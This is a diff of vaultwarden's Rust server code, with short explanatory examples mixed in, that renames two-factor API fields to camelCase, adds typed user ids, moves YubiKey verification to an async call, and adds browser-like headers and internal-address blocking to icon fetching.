-// This is copied from PublicKeyCredential to change the Response objects casing
 #[derive(Debug, Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 pub struct PublicKeyCredentialCopy {
-    pub Id: String,
-    pub RawId: Base64UrlSafeData,
-    pub Response: AuthenticatorAssertionResponseRawCopy,
-    pub Extensions: Option<AuthenticationExtensionsClientOutputsCopy>,
-    pub Type: String,
+    pub id: String,
+    pub raw_id: Base64UrlSafeData,
+    pub response: AuthenticatorAssertionResponseRawCopy,
+    pub extensions: Option<AuthenticationExtensionsClientOutputs>,
+    pub r#type: String,
 }

 // This is copied from AuthenticatorAssertionResponseRaw to change clientDataJSON to clientDataJson
 #[derive(Debug, Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 pub struct AuthenticatorAssertionResponseRawCopy {
-    pub AuthenticatorData: Base64UrlSafeData,
-    pub ClientDataJson: Base64UrlSafeData,
-    pub Signature: Base64UrlSafeData,
-    pub UserHandle: Option<Base64UrlSafeData>,
-}
-
-#[derive(Debug, Deserialize)]
-#[allow(non_snake_case)]
-pub struct AuthenticationExtensionsClientOutputsCopy {
-    #[serde(default)]
-    pub Appid: bool,
+    pub authenticator_data: Base64UrlSafeData,
+    #[serde(rename = "clientDataJson", alias = "clientDataJSON")]
+    pub client_data_json: Base64UrlSafeData,
+    pub signature: Base64UrlSafeData,
+    pub user_handle: Option<Base64UrlSafeData>,
 }

 impl From<PublicKeyCredentialCopy> for PublicKeyCredential {
     fn from(r: PublicKeyCredentialCopy) -> Self {
         Self {
-            id: r.Id,
-            raw_id: r.RawId,
+            id: r.id,
+            raw_id: r.raw_id,
             response: AuthenticatorAssertionResponseRaw {
-                authenticator_data: r.Response.AuthenticatorData,
-                client_data_json: r.Response.ClientDataJson,
-                signature: r.Response.Signature,
-                user_handle: r.Response.UserHandle,
+                authenticator_data: r.response.authenticator_data,
+                client_data_json: r.response.client_data_json,
+                signature: r.response.signature,
+                user_handle: r.response.user_handle,
             },
-            extensions: r.Extensions.map(|e| AuthenticationExtensionsClientOutputs {
-                appid: e.Appid,
-            }),
-            type_: r.Type,
+            extensions: r.extensions,
+            type_: r.r#type,
         }
     }
 }

 #[post("/two-factor/webauthn", data = "<data>")]
-async fn activate_webauthn(data: JsonUpcase<EnableWebauthnData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let data: EnableWebauthnData = data.into_inner().data;
+async fn activate_webauthn(data: Json<EnableWebauthnData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: EnableWebauthnData = data.into_inner();
     let mut user = headers.user;

     PasswordOrOtpData {
-        MasterPasswordHash: data.MasterPasswordHash,
-        Otp: data.Otp,
+        master_password_hash: data.master_password_hash,
+        otp: data.otp,
     }
     .validate(&user, true, &mut conn)
     .await?;
@@ -274,13 +262,13 @@ async fn activate_webauthn(data: JsonUpcase<EnableWebauthnData>, headers: Header

     // Verify the credentials with the saved state
     let (credential, _data) =
-        WebauthnConfig::load().register_credential(&data.DeviceResponse.into(), &state, |_| Ok(false))?;
+        WebauthnConfig::load().register_credential(&data.device_response.into(), &state, |_| Ok(false))?;

     let mut registrations: Vec<_> = get_webauthn_registrations(&user.uuid, &mut conn).await?.1;
     // TODO: Check for repeated ID's
     registrations.push(WebauthnRegistration {
-        id: data.Id.into_i32()?,
-        name: data.Name,
+        id: data.id.into_i32()?,
+        name: data.name,
         migrated: false,

         credential,
@@ -296,42 +284,41 @@ async fn activate_webauthn(data: JsonUpcase<EnableWebauthnData>, headers: Header

     let keys_json: Vec<Value> = registrations.iter().map(WebauthnRegistration::to_json).collect();
     Ok(Json(json!({
-        "Enabled": true,
-        "Keys": keys_json,
-        "Object": "twoFactorU2f"
+        "enabled": true,
+        "keys": keys_json,
+        "object": "twoFactorU2f"
     })))
 }

 #[put("/two-factor/webauthn", data = "<data>")]
-async fn activate_webauthn_put(data: JsonUpcase<EnableWebauthnData>, headers: Headers, conn: DbConn) -> JsonResult {
+async fn activate_webauthn_put(data: Json<EnableWebauthnData>, headers: Headers, conn: DbConn) -> JsonResult {
     activate_webauthn(data, headers, conn).await
 }

-#[derive(Deserialize, Debug)]
-#[allow(non_snake_case)]
+#[derive(Debug, Deserialize)]
+#[serde(rename_all = "camelCase")]
 struct DeleteU2FData {
-    Id: NumberOrString,
-    MasterPasswordHash: String,
+    id: NumberOrString,
+    master_password_hash: String,
 }

 #[delete("/two-factor/webauthn", data = "<data>")]
-async fn delete_webauthn(data: JsonUpcase<DeleteU2FData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let id = data.data.Id.into_i32()?;
-    if !headers.user.check_valid_password(&data.data.MasterPasswordHash) {
+async fn delete_webauthn(data: Json<DeleteU2FData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let id = data.id.into_i32()?;
+    if !headers.user.check_valid_password(&data.master_password_hash) {
         err!("Invalid password");
     }

-    let mut tf =
-        match TwoFactor::find_by_user_and_type(&headers.user.uuid, TwoFactorType::Webauthn as i32, &mut conn).await {
-            Some(tf) => tf,
-            None => err!("Webauthn data not found!"),
+    let Some(mut tf) =
+        TwoFactor::find_by_user_and_type(&headers.user.uuid, TwoFactorType::Webauthn as i32, &mut conn).await
+    else {
+        err!("Webauthn data not found!")
     };

     let mut data: Vec<WebauthnRegistration> = serde_json::from_str(&tf.data)?;

-    let item_pos = match data.iter().position(|r| r.id == id) {
-        Some(p) => p,
-        None => err!("Webauthn entry not found"),
+    let Some(item_pos) = data.iter().position(|r| r.id == id) else {
+        err!("Webauthn entry not found")
     };

     let removed_item = data.remove(item_pos);
@@ -358,27 +345,27 @@ async fn delete_webauthn(data: JsonUpcase<DeleteU2FData>, headers: Headers, mut
     let keys_json: Vec<Value> = data.iter().map(WebauthnRegistration::to_json).collect();

     Ok(Json(json!({
-        "Enabled": true,
-        "Keys": keys_json,
-        "Object": "twoFactorU2f"
+        "enabled": true,
+        "keys": keys_json,
+        "object": "twoFactorU2f"
     })))
 }

 pub async fn get_webauthn_registrations(
-    user_uuid: &str,
+    user_id: &UserId,
     conn: &mut DbConn,
 ) -> Result<(bool, Vec<WebauthnRegistration>), Error> {
     let type_ = TwoFactorType::Webauthn as i32;
-    match TwoFactor::find_by_user_and_type(user_uuid, type_, conn).await {
+    match TwoFactor::find_by_user_and_type(user_id, type_, conn).await {
         Some(tf) => Ok((tf.enabled, serde_json::from_str(&tf.data)?)),
         None => Ok((false, Vec::new())), // If no data, return empty list
     }
 }

-pub async fn generate_webauthn_login(user_uuid: &str, conn: &mut DbConn) -> JsonResult {
+pub async fn generate_webauthn_login(user_id: &UserId, conn: &mut DbConn) -> JsonResult {
     // Load saved credentials
     let creds: Vec<Credential> =
-        get_webauthn_registrations(user_uuid, conn).await?.1.into_iter().map(|r| r.credential).collect();
+        get_webauthn_registrations(user_id, conn).await?.1.into_iter().map(|r| r.credential).collect();

     if creds.is_empty() {
         err!("No Webauthn devices registered")
@@ -389,7 +376,7 @@ pub async fn generate_webauthn_login(user_uuid: &str, conn: &mut DbConn) -> Json
     let (response, state) = WebauthnConfig::load().generate_challenge_authenticate_options(creds, Some(ext))?;

     // Save the challenge state for later validation
-    TwoFactor::new(user_uuid.into(), TwoFactorType::WebauthnLoginChallenge, serde_json::to_string(&state)?)
+    TwoFactor::new(user_id.clone(), TwoFactorType::WebauthnLoginChallenge, serde_json::to_string(&state)?)
         .save(conn)
         .await?;

@@ -397,9 +384,9 @@ pub async fn generate_webauthn_login(user_uuid: &str, conn: &mut DbConn) -> Json
     Ok(Json(serde_json::to_value(response.public_key)?))
 }

-pub async fn validate_webauthn_login(user_uuid: &str, response: &str, conn: &mut DbConn) -> EmptyResult {
+pub async fn validate_webauthn_login(user_id: &UserId, response: &str, conn: &mut DbConn) -> EmptyResult {
     let type_ = TwoFactorType::WebauthnLoginChallenge as i32;
-    let state = match TwoFactor::find_by_user_and_type(user_uuid, type_, conn).await {
+    let state = match TwoFactor::find_by_user_and_type(user_id, type_, conn).await {
         Some(tf) => {
             let state: AuthenticationState = serde_json::from_str(&tf.data)?;
             tf.delete(conn).await?;
@@ -413,10 +400,10 @@ pub async fn validate_webauthn_login(user_uuid: &str, response: &str, conn: &mut
         ),
     };

-    let rsp: crate::util::UpCase<PublicKeyCredentialCopy> = serde_json::from_str(response)?;
-    let rsp: PublicKeyCredential = rsp.data.into();
+    let rsp: PublicKeyCredentialCopy = serde_json::from_str(response)?;
+    let rsp: PublicKeyCredential = rsp.into();

-    let mut registrations = get_webauthn_registrations(user_uuid, conn).await?.1;
+    let mut registrations = get_webauthn_registrations(user_id, conn).await?.1;

     // If the credential we received is migrated from U2F, enable the U2F compatibility
     //let use_u2f = registrations.iter().any(|r| r.migrated && r.credential.cred_id == rsp.raw_id.0);
@@ -426,7 +413,7 @@ pub async fn validate_webauthn_login(user_uuid: &str, response: &str, conn: &mut
         if &reg.credential.cred_id == cred_id {
             reg.credential.counter = auth_data.counter;

-            TwoFactor::new(user_uuid.to_string(), TwoFactorType::Webauthn, serde_json::to_string(&registrations)?)
+            TwoFactor::new(user_id.clone(), TwoFactorType::Webauthn, serde_json::to_string(&registrations)?)
                 .save(conn)
                 .await?;
             return Ok(());
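Throughout these files, bare `&str` ids give way to typed ids such as `UserId` and `OrganizationId`. The definitions below are assumptions for illustration, not vaultwarden's actual declarations, but they show the point of the newtype pattern: mixing up two kinds of id becomes a compile error, at zero runtime cost.

```rust
#[derive(Clone, Debug, PartialEq, Eq)]
pub struct UserId(String);

#[derive(Clone, Debug, PartialEq, Eq)]
pub struct OrganizationId(String);

fn find_user(_user_id: &UserId) { /* look up the user */ }

fn main() {
    // Illustrative id values only.
    let user_id = UserId("3fa85f64-5717-4562-b3fc-2c963f66afa6".into());
    let org_id = OrganizationId("7f3c1a22-0000-4000-8000-000000000000".into());
    find_user(&user_id);
    // find_user(&org_id); // rejected: expected `&UserId`, found `&OrganizationId`
    let _ = org_id;
}
```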
src/api/core/two_factor/yubikey.rs
@@ -1,12 +1,12 @@
 use rocket::serde::json::Json;
 use rocket::Route;
 use serde_json::Value;
-use yubico::{config::Config, verify};
+use yubico::{config::Config, verify_async};

 use crate::{
     api::{
         core::{log_user_event, two_factor::_generate_recover_code},
-        EmptyResult, JsonResult, JsonUpcase, PasswordOrOtpData,
+        EmptyResult, JsonResult, PasswordOrOtpData,
     },
     auth::Headers,
     db::{
@@ -21,33 +21,35 @@ pub fn routes() -> Vec<Route> {
     routes![generate_yubikey, activate_yubikey, activate_yubikey_put,]
 }

-#[derive(Deserialize, Debug)]
-#[allow(non_snake_case)]
+#[derive(Debug, Deserialize)]
+#[serde(rename_all = "camelCase")]
 struct EnableYubikeyData {
-    Key1: Option<String>,
-    Key2: Option<String>,
-    Key3: Option<String>,
-    Key4: Option<String>,
-    Key5: Option<String>,
-    Nfc: bool,
-    MasterPasswordHash: Option<String>,
-    Otp: Option<String>,
+    key1: Option<String>,
+    key2: Option<String>,
+    key3: Option<String>,
+    key4: Option<String>,
+    key5: Option<String>,
+    nfc: bool,
+    master_password_hash: Option<String>,
+    otp: Option<String>,
 }

 #[derive(Deserialize, Serialize, Debug)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 pub struct YubikeyMetadata {
-    Keys: Vec<String>,
-    pub Nfc: bool,
+    #[serde(rename = "keys", alias = "Keys")]
+    keys: Vec<String>,
+    #[serde(rename = "nfc", alias = "Nfc")]
+    pub nfc: bool,
 }

 fn parse_yubikeys(data: &EnableYubikeyData) -> Vec<String> {
-    let data_keys = [&data.Key1, &data.Key2, &data.Key3, &data.Key4, &data.Key5];
+    let data_keys = [&data.key1, &data.key2, &data.key3, &data.key4, &data.key5];

     data_keys.iter().filter_map(|e| e.as_ref().cloned()).collect()
 }

-fn jsonify_yubikeys(yubikeys: Vec<String>) -> serde_json::Value {
+fn jsonify_yubikeys(yubikeys: Vec<String>) -> Value {
     let mut result = Value::Object(serde_json::Map::new());

     for (i, key) in yubikeys.into_iter().enumerate() {
@@ -74,56 +76,53 @@ async fn verify_yubikey_otp(otp: String) -> EmptyResult {
     let config = Config::default().set_client_id(yubico_id).set_key(yubico_secret);

     match CONFIG.yubico_server() {
-        Some(server) => {
-            tokio::task::spawn_blocking(move || verify(otp, config.set_api_hosts(vec![server]))).await.unwrap()
-        }
-        None => tokio::task::spawn_blocking(move || verify(otp, config)).await.unwrap(),
+        Some(server) => verify_async(otp, config.set_api_hosts(vec![server])).await,
+        None => verify_async(otp, config).await,
     }
     .map_res("Failed to verify OTP")
-    .and(Ok(()))
 }

 #[post("/two-factor/get-yubikey", data = "<data>")]
-async fn generate_yubikey(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn generate_yubikey(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
     // Make sure the credentials are set
     get_yubico_credentials()?;

-    let data: PasswordOrOtpData = data.into_inner().data;
+    let data: PasswordOrOtpData = data.into_inner();
     let user = headers.user;

     data.validate(&user, false, &mut conn).await?;

-    let user_uuid = &user.uuid;
+    let user_id = &user.uuid;
     let yubikey_type = TwoFactorType::YubiKey as i32;

-    let r = TwoFactor::find_by_user_and_type(user_uuid, yubikey_type, &mut conn).await;
+    let r = TwoFactor::find_by_user_and_type(user_id, yubikey_type, &mut conn).await;

     if let Some(r) = r {
         let yubikey_metadata: YubikeyMetadata = serde_json::from_str(&r.data)?;

-        let mut result = jsonify_yubikeys(yubikey_metadata.Keys);
+        let mut result = jsonify_yubikeys(yubikey_metadata.keys);

-        result["Enabled"] = Value::Bool(true);
-        result["Nfc"] = Value::Bool(yubikey_metadata.Nfc);
-        result["Object"] = Value::String("twoFactorU2f".to_owned());
+        result["enabled"] = Value::Bool(true);
+        result["nfc"] = Value::Bool(yubikey_metadata.nfc);
+        result["object"] = Value::String("twoFactorU2f".to_owned());

         Ok(Json(result))
     } else {
         Ok(Json(json!({
-            "Enabled": false,
-            "Object": "twoFactorU2f",
+            "enabled": false,
+            "object": "twoFactorU2f",
         })))
     }
 }

 #[post("/two-factor/yubikey", data = "<data>")]
-async fn activate_yubikey(data: JsonUpcase<EnableYubikeyData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let data: EnableYubikeyData = data.into_inner().data;
+async fn activate_yubikey(data: Json<EnableYubikeyData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: EnableYubikeyData = data.into_inner();
     let mut user = headers.user;

     PasswordOrOtpData {
-        MasterPasswordHash: data.MasterPasswordHash.clone(),
-        Otp: data.Otp.clone(),
+        master_password_hash: data.master_password_hash.clone(),
+        otp: data.otp.clone(),
     }
     .validate(&user, true, &mut conn)
     .await?;
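`verify_yubikey_otp` above drops `tokio::task::spawn_blocking` (and the `.unwrap()` on its `JoinHandle`) now that the yubico crate's `verify_async` can be awaited directly, as the import change at the top of the file shows. The sketch below illustrates the general before/after shape with stand-in functions; the names and timings are illustrative only, and tokio is assumed as the runtime:

```rust
use std::time::Duration;

fn slow_sync() -> Result<(), ()> {
    std::thread::sleep(Duration::from_millis(10)); // would block the executor
    Ok(())
}

async fn slow_async() -> Result<(), ()> {
    tokio::time::sleep(Duration::from_millis(10)).await; // yields instead
    Ok(())
}

#[tokio::main]
async fn main() {
    // Before: ship the sync call to a blocking thread, then unwrap the JoinHandle.
    let before = tokio::task::spawn_blocking(slow_sync).await.unwrap();
    // After: await the async variant directly.
    let after = slow_async().await;
    assert_eq!(before, after);
}
```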
@@ -139,26 +138,25 @@ async fn activate_yubikey(data: JsonUpcase<EnableYubikeyData>, headers: Headers,

     if yubikeys.is_empty() {
         return Ok(Json(json!({
-            "Enabled": false,
-            "Object": "twoFactorU2f",
+            "enabled": false,
+            "object": "twoFactorU2f",
         })));
     }

     // Ensure they are valid OTPs
     for yubikey in &yubikeys {
-        if yubikey.len() == 12 {
-            // YubiKey ID
+        if yubikey.is_empty() || yubikey.len() == 12 {
             continue;
         }

         verify_yubikey_otp(yubikey.to_owned()).await.map_res("Invalid Yubikey OTP provided")?;
     }

-    let yubikey_ids: Vec<String> = yubikeys.into_iter().map(|x| (x[..12]).to_owned()).collect();
+    let yubikey_ids: Vec<String> = yubikeys.into_iter().filter_map(|x| x.get(..12).map(str::to_owned)).collect();

     let yubikey_metadata = YubikeyMetadata {
-        Keys: yubikey_ids,
-        Nfc: data.Nfc,
+        keys: yubikey_ids,
+        nfc: data.nfc,
     };

     yubikey_data.data = serde_json::to_string(&yubikey_metadata).unwrap();
@@ -168,17 +166,17 @@ async fn activate_yubikey(data: JsonUpcase<EnableYubikeyData>, headers: Headers,
|
|||||||
|
|
||||||
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
||||||
|
|
||||||
let mut result = jsonify_yubikeys(yubikey_metadata.Keys);
|
let mut result = jsonify_yubikeys(yubikey_metadata.keys);
|
||||||
|
|
||||||
result["Enabled"] = Value::Bool(true);
|
result["enabled"] = Value::Bool(true);
|
||||||
result["Nfc"] = Value::Bool(yubikey_metadata.Nfc);
|
result["nfc"] = Value::Bool(yubikey_metadata.nfc);
|
||||||
result["Object"] = Value::String("twoFactorU2f".to_owned());
|
result["object"] = Value::String("twoFactorU2f".to_owned());
|
||||||
|
|
||||||
Ok(Json(result))
|
Ok(Json(result))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/two-factor/yubikey", data = "<data>")]
|
#[put("/two-factor/yubikey", data = "<data>")]
|
||||||
async fn activate_yubikey_put(data: JsonUpcase<EnableYubikeyData>, headers: Headers, conn: DbConn) -> JsonResult {
|
async fn activate_yubikey_put(data: Json<EnableYubikeyData>, headers: Headers, conn: DbConn) -> JsonResult {
|
||||||
activate_yubikey(data, headers, conn).await
|
activate_yubikey(data, headers, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -190,14 +188,10 @@ pub async fn validate_yubikey_login(response: &str, twofactor_data: &str) -> Emp
|
|||||||
let yubikey_metadata: YubikeyMetadata = serde_json::from_str(twofactor_data).expect("Can't parse Yubikey Metadata");
|
let yubikey_metadata: YubikeyMetadata = serde_json::from_str(twofactor_data).expect("Can't parse Yubikey Metadata");
|
||||||
let response_id = &response[..12];
|
let response_id = &response[..12];
|
||||||
|
|
||||||
if !yubikey_metadata.Keys.contains(&response_id.to_owned()) {
|
if !yubikey_metadata.keys.contains(&response_id.to_owned()) {
|
||||||
err!("Given Yubikey is not registered");
|
err!("Given Yubikey is not registered");
|
||||||
}
|
}
|
||||||
|
|
||||||
let result = verify_yubikey_otp(response.to_owned()).await;
|
verify_yubikey_otp(response.to_owned()).await.map_res("Failed to verify Yubikey against OTP server")?;
|
||||||
|
Ok(())
|
||||||
match result {
|
|
||||||
Ok(_answer) => Ok(()),
|
|
||||||
Err(_e) => err!("Failed to verify Yubikey against OTP server"),
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|||||||
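The field renames above (`Keys` to `keys`, `Nfc` to `nfc`) and the switch from `JsonUpcase<T>` to plain `Json<T>` go together: instead of upcasing incoming JSON keys in a custom extractor, the payload structs can do the renaming via serde attributes. A minimal sketch of the mechanism (illustration only; the actual vaultwarden struct definitions and attributes are not visible in this hunk, so `alias` here is an assumption about how old PascalCase data stored in the database could still be read):

```rust
use serde::{Deserialize, Serialize};

// Hypothetical stand-in for the real struct; only the serde attributes matter.
// `rename` controls what gets written, `alias` additionally accepts the old key.
#[derive(Serialize, Deserialize)]
struct YubikeyMetadata {
    #[serde(rename = "keys", alias = "Keys")]
    keys: Vec<String>,
    #[serde(rename = "nfc", alias = "Nfc")]
    nfc: bool,
}

fn main() {
    // Old stored shape still deserializes...
    let m: YubikeyMetadata = serde_json::from_str(r#"{"Keys":["cccccctugefj"],"Nfc":true}"#).unwrap();
    // ...while new output uses the lowercase keys: {"keys":["cccccctugefj"],"nfc":true}
    println!("{}", serde_json::to_string(&m).unwrap());
}
```

Note also the hardening in the same hunk: `x.get(..12)` in the `filter_map` cannot panic on inputs shorter than 12 bytes, unlike the old `x[..12]` slice.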
src/api/icons.rs (495 changes)
@@ -1,4 +1,5 @@
 use std::{
+    collections::HashMap,
     net::IpAddr,
     sync::Arc,
     time::{Duration, SystemTime},
@@ -13,17 +14,15 @@ use reqwest::{
     Client, Response,
 };
 use rocket::{http::ContentType, response::Redirect, Route};
-use tokio::{
-    fs::{create_dir_all, remove_file, symlink_metadata, File},
-    io::{AsyncReadExt, AsyncWriteExt},
-    net::lookup_host,
-};
+use svg_hush::{data_url_filter, Filter};

-use html5gum::{Emitter, HtmlString, InfallibleTokenizer, Readable, StringReader, Tokenizer};
+use html5gum::{Emitter, HtmlString, Readable, StringReader, Tokenizer};

 use crate::{
+    config::PathType,
     error::Error,
-    util::{get_reqwest_client_builder, Cached},
+    http_client::{get_reqwest_client_builder, should_block_address, CustomHttpClientError},
+    util::Cached,
     CONFIG,
 };

@@ -37,11 +36,29 @@ pub fn routes() -> Vec<Route> {
 static CLIENT: Lazy<Client> = Lazy::new(|| {
     // Generate the default headers
     let mut default_headers = HeaderMap::new();
-    default_headers.insert(header::USER_AGENT, HeaderValue::from_static("Links (2.22; Linux X86_64; GNU C; text)"));
-    default_headers.insert(header::ACCEPT, HeaderValue::from_static("text/html, text/*;q=0.5, image/*, */*;q=0.1"));
-    default_headers.insert(header::ACCEPT_LANGUAGE, HeaderValue::from_static("en,*;q=0.1"));
+    default_headers.insert(
+        header::USER_AGENT,
+        HeaderValue::from_static(
+            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36",
+        ),
+    );
+    default_headers.insert(header::ACCEPT, HeaderValue::from_static("text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"));
+    default_headers.insert(header::ACCEPT_LANGUAGE, HeaderValue::from_static("en-US,en;q=0.9"));
     default_headers.insert(header::CACHE_CONTROL, HeaderValue::from_static("no-cache"));
     default_headers.insert(header::PRAGMA, HeaderValue::from_static("no-cache"));
+    default_headers.insert(header::UPGRADE_INSECURE_REQUESTS, HeaderValue::from_static("1"));
+
+    default_headers.insert("Sec-Ch-Ua-Mobile", HeaderValue::from_static("?0"));
+    default_headers.insert("Sec-Ch-Ua-Platform", HeaderValue::from_static("Linux"));
+    default_headers.insert(
+        "Sec-Ch-Ua",
+        HeaderValue::from_static("\"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"138\", \"Google Chrome\";v=\"138\""),
+    );
+
+    default_headers.insert("Sec-Fetch-Site", HeaderValue::from_static("none"));
+    default_headers.insert("Sec-Fetch-Mode", HeaderValue::from_static("navigate"));
+    default_headers.insert("Sec-Fetch-User", HeaderValue::from_static("?1"));
+    default_headers.insert("Sec-Fetch-Dest", HeaderValue::from_static("document"));

     // Generate the cookie store
     let cookie_store = Arc::new(Jar::default());
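The icon fetcher now presents itself as a current Chrome build (User-Agent, `Sec-Ch-Ua`, and `Sec-Fetch-*` client hints) instead of the old Links text-browser string, since many sites refuse or alter responses for non-browser agents. Headers registered this way apply to every request made through the shared client; a minimal sketch of the same reqwest pattern (standalone example, not vaultwarden code):

```rust
use reqwest::header::{HeaderMap, HeaderValue, USER_AGENT};

#[tokio::main]
async fn main() -> Result<(), reqwest::Error> {
    let mut headers = HeaderMap::new();
    // Set once on the builder; sent with every request from this client.
    headers.insert(USER_AGENT, HeaderValue::from_static("Mozilla/5.0 (X11; Linux x86_64)"));

    let client = reqwest::Client::builder().default_headers(headers).build()?;
    let status = client.get("https://example.com").send().await?.status();
    println!("{status}");
    Ok(())
}
```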
@@ -49,48 +66,36 @@ static CLIENT: Lazy<Client> = Lazy::new(|| {
     let icon_download_timeout = Duration::from_secs(CONFIG.icon_download_timeout());
     let pool_idle_timeout = Duration::from_secs(10);
     // Reuse the client between requests
-    let client = get_reqwest_client_builder()
+    get_reqwest_client_builder()
         .cookie_provider(Arc::clone(&cookie_store))
         .timeout(icon_download_timeout)
         .pool_max_idle_per_host(5) // Configure the Hyper Pool to only have max 5 idle connections
         .pool_idle_timeout(pool_idle_timeout) // Configure the Hyper Pool to timeout after 10 seconds
-        .trust_dns(true)
-        .default_headers(default_headers.clone());
-
-    match client.build() {
-        Ok(client) => client,
-        Err(e) => {
-            error!("Possible trust-dns error, trying with trust-dns disabled: '{e}'");
-            get_reqwest_client_builder()
-                .cookie_provider(cookie_store)
-                .timeout(icon_download_timeout)
-                .pool_max_idle_per_host(5) // Configure the Hyper Pool to only have max 5 idle connections
-                .pool_idle_timeout(pool_idle_timeout) // Configure the Hyper Pool to timeout after 10 seconds
-                .trust_dns(false)
-                .default_headers(default_headers)
-                .build()
-                .expect("Failed to build client")
-        }
-    }
+        .default_headers(default_headers.clone())
+        .http1_title_case_headers()
+        .build()
+        .expect("Failed to build client")
 });

 // Build Regex only once since this takes a lot of time.
 static ICON_SIZE_REGEX: Lazy<Regex> = Lazy::new(|| Regex::new(r"(?x)(\d+)\D*(\d+)").unwrap());

-// Special HashMap which holds the user defined Regex to speedup matching the regex.
-static ICON_BLACKLIST_REGEX: Lazy<dashmap::DashMap<String, Regex>> = Lazy::new(dashmap::DashMap::new);
-
-async fn icon_redirect(domain: &str, template: &str) -> Option<Redirect> {
+// The function name `icon_external` is checked in the `on_response` function in `AppHeaders`
+// It is used to prevent sending a specific header which breaks icon downloads.
+// If this function needs to be renamed, also adjust the code in `util.rs`
+#[get("/<domain>/icon.png")]
+fn icon_external(domain: &str) -> Option<Redirect> {
     if !is_valid_domain(domain) {
-        warn!("Invalid domain: {}", domain);
+        warn!("Invalid domain: {domain}");
         return None;
     }

-    if check_domain_blacklist_reason(domain).await.is_some() {
+    if should_block_address(domain) {
+        warn!("Blocked address: {domain}");
         return None;
     }

-    let url = template.replace("{}", domain);
+    let url = CONFIG._icon_service_url().replace("{}", domain);
     match CONFIG.icon_redirect_code() {
         301 => Some(Redirect::moved(url)), // legacy permanent redirect
         302 => Some(Redirect::found(url)), // legacy temporary redirect
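`should_block_address` lives in the new `http_client` module, which is not part of this diff, so its exact rules are not visible here. A rough sketch of what such a guard can look like (names and checks are assumptions for illustration, not vaultwarden's implementation):

```rust
use std::net::IpAddr;

// Hypothetical illustration of an address guard: reject literal IPs that are
// loopback, private, or link-local before any outbound request is made.
fn should_block_address(host: &str) -> bool {
    match host.parse::<IpAddr>() {
        Ok(IpAddr::V4(ip)) => ip.is_loopback() || ip.is_private() || ip.is_link_local(),
        Ok(IpAddr::V6(ip)) => ip.is_loopback() || (ip.segments()[0] & 0xfe00) == 0xfc00,
        // Hostnames can only be judged at DNS-resolution time, which is why
        // vaultwarden hooks a custom resolver into reqwest (see CustomHttpClientError).
        Err(_) => false,
    }
}

fn main() {
    assert!(should_block_address("127.0.0.1"));
    assert!(!should_block_address("example.com"));
}
```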
@@ -103,17 +108,21 @@ async fn icon_redirect(domain: &str, template: &str) -> Option<Redirect> {
     }
 }

-#[get("/<domain>/icon.png")]
-async fn icon_external(domain: &str) -> Option<Redirect> {
-    icon_redirect(domain, &CONFIG._icon_service_url()).await
-}
-
 #[get("/<domain>/icon.png")]
 async fn icon_internal(domain: &str) -> Cached<(ContentType, Vec<u8>)> {
     const FALLBACK_ICON: &[u8] = include_bytes!("../static/images/fallback-icon.png");

     if !is_valid_domain(domain) {
-        warn!("Invalid domain: {}", domain);
+        warn!("Invalid domain: {domain}");
+        return Cached::ttl(
+            (ContentType::new("image", "png"), FALLBACK_ICON.to_vec()),
+            CONFIG.icon_cache_negttl(),
+            true,
+        );
+    }
+
+    if should_block_address(domain) {
+        warn!("Blocked address: {domain}");
         return Cached::ttl(
             (ContentType::new("image", "png"), FALLBACK_ICON.to_vec()),
             CONFIG.icon_cache_negttl(),
@@ -138,7 +147,7 @@ fn is_valid_domain(domain: &str) -> bool {

     // If parsing the domain fails using Url, it will not work with reqwest.
     if let Err(parse_error) = url::Url::parse(format!("https://{domain}").as_str()) {
-        debug!("Domain parse error: '{}' - {:?}", domain, parse_error);
+        debug!("Domain parse error: '{domain}' - {parse_error:?}");
         return false;
     } else if domain.is_empty()
         || domain.contains("..")
@@ -147,18 +156,17 @@ fn is_valid_domain(domain: &str) -> bool {
         || domain.ends_with('-')
     {
         debug!(
-            "Domain validation error: '{}' is either empty, contains '..', starts with an '.', starts or ends with a '-'",
-            domain
+            "Domain validation error: '{domain}' is either empty, contains '..', starts with an '.', starts or ends with a '-'"
         );
         return false;
     } else if domain.len() > 255 {
-        debug!("Domain validation error: '{}' exceeds 255 characters", domain);
+        debug!("Domain validation error: '{domain}' exceeds 255 characters");
         return false;
     }

     for c in domain.chars() {
         if !c.is_alphanumeric() && !ALLOWED_CHARS.contains(c) {
-            debug!("Domain validation error: '{}' contains an invalid character '{}'", domain, c);
+            debug!("Domain validation error: '{domain}' contains an invalid character '{c}'");
             return false;
         }
     }
@@ -166,157 +174,8 @@ fn is_valid_domain(domain: &str) -> bool {
     true
 }

-/// TODO: This is extracted from IpAddr::is_global, which is unstable:
-/// https://doc.rust-lang.org/nightly/std/net/enum.IpAddr.html#method.is_global
-/// Remove once https://github.com/rust-lang/rust/issues/27709 is merged
-#[allow(clippy::nonminimal_bool)]
-#[cfg(not(feature = "unstable"))]
-fn is_global(ip: IpAddr) -> bool {
-    match ip {
-        IpAddr::V4(ip) => {
-            // check if this address is 192.0.0.9 or 192.0.0.10. These addresses are the only two
-            // globally routable addresses in the 192.0.0.0/24 range.
-            if u32::from(ip) == 0xc0000009 || u32::from(ip) == 0xc000000a {
-                return true;
-            }
-            !ip.is_private()
